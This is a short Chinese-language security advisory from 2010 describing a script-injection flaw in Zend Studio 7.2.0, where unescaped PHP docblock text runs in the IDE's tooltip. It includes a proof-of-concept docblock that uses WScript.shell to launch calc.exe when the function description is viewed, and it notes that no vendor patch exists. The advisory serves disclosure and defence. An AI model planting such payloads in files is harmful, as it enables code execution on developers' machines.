发布日期:2010-07-12
更新日期:2010-07-13
受影响系统:
Zend Zend Studio 7.2.0
描述:
--------------------------------------------------------------------------------
Zend Studio是Zend Technologies开发的PHP语言集成开发环境。
Zend Studio没有对PHP函数的描述进行转义或htmlencode编码便在tooltip对话框中显示,用户受骗打开了特制的PHP文件并通过tooltip显示了恶意函数描述就会导致注入并执行恶意代码。
<*来源:saiy1986 (saiy1986@gmail.com)
链接:
?l=full-disclosure&m=127874100613413&q=p5
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
/**
* <script>new ActiveXObject("WScript.shell").Run('calc.exe',1,true);</script>");
*/
function a() {
}
然后打开函数a()的描述(键入a或移动鼠标)就会运行calc.exe。
建议:
--------------------------------------------------------------------------------
厂商补丁:
Zend
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: